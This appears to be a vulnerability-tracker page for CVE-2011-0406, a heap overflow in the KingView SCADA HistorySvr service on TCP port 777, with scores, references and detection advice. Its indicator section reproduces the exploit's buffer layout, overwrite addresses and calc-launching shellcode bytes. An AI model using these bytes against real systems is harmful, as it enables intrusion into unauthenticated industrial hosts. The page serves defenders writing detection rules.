CVE-2011-0406
published 2011-01-11CVE-2011-0406: Heap-based buffer overflow in HistorySvr.exe in WellinTech KingView 6.53 allows remote attackers to execute arbitrary code via a long request to TCP port 777.
PriorityP269critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
20.94%
97.2th percentile
Heap-based buffer overflow in HistorySvr.exe in WellinTech KingView 6.53 allows remote attackers to execute arbitrary code via a long request to TCP port 777.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wellintech | kingview | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x90 * 1024 + \x44 * 31788 + \xeb\x14 + \x44 * 6 + \xad\xbb\xc3\x77 + \xb4\x73\xed\x77
bytes↗
\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9\x44\x80\xc2\x77\xFF\xD1\x90\x90
- →Monitor for large TCP connections (>32KB payload) to port 777 targeting HistorySvr.exe; the exploit sends a payload of 1024 NOP bytes followed by 31788 bytes of 0x44, which is a distinctive oversized request pattern. ↗
- →HistorySvr.exe listens on TCP port 777 and requires NO authentication; any inbound connection to this port from an external/untrusted host should be treated as suspicious. ↗
- →Look for heap corruption indicators in HistorySvr.exe crash telemetry: EAX=0x42424242 and ECX=0x44444444 are canary values written by the exploit to overwrite Flink/Blink heap pointers. ↗
- →Detect exploit attempts by looking for the JMP short opcode sequence 0xEB 0x14 embedded within a large block of 0x44 bytes in a TCP/777 stream, which is the exploit's heap-overwrite pivot. ↗
- ·The shellcode payload in the PoC only launches calc.exe (proof-of-concept); real-world attacks would substitute arbitrary shellcode, so byte-for-byte shellcode matching alone is insufficient for detection. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/70366http://secunia.com/advisories/42851http://securityreason.com/securityalert/8134http://thesauceofutterpwnage.blogspot.com/2011/01/waking-up-sleeping-dragon.htmlhttp://www.cnnvd.org.cn/showCnnvd.html?id=2011010108http://www.exploit-db.com/exploits/15957http://www.kb.cert.org/vuls/id/180119http://www.kingview.com/news/detail.aspx?contentid=528http://www.securityfocus.com/bid/45727http://www.vupen.com/english/advisories/2011/0063https://exchange.xforce.ibmcloud.com/vulnerabilities/64559http://osvdb.org/70366http://secunia.com/advisories/42851http://securityreason.com/securityalert/8134http://thesauceofutterpwnage.blogspot.com/2011/01/waking-up-sleeping-dragon.htmlhttp://www.cnnvd.org.cn/showCnnvd.html?id=2011010108http://www.exploit-db.com/exploits/15957http://www.kb.cert.org/vuls/id/180119http://www.kingview.com/news/detail.aspx?contentid=528http://www.securityfocus.com/bid/45727http://www.vupen.com/english/advisories/2011/0063https://exchange.xforce.ibmcloud.com/vulnerabilities/64559
2011-01-11
Published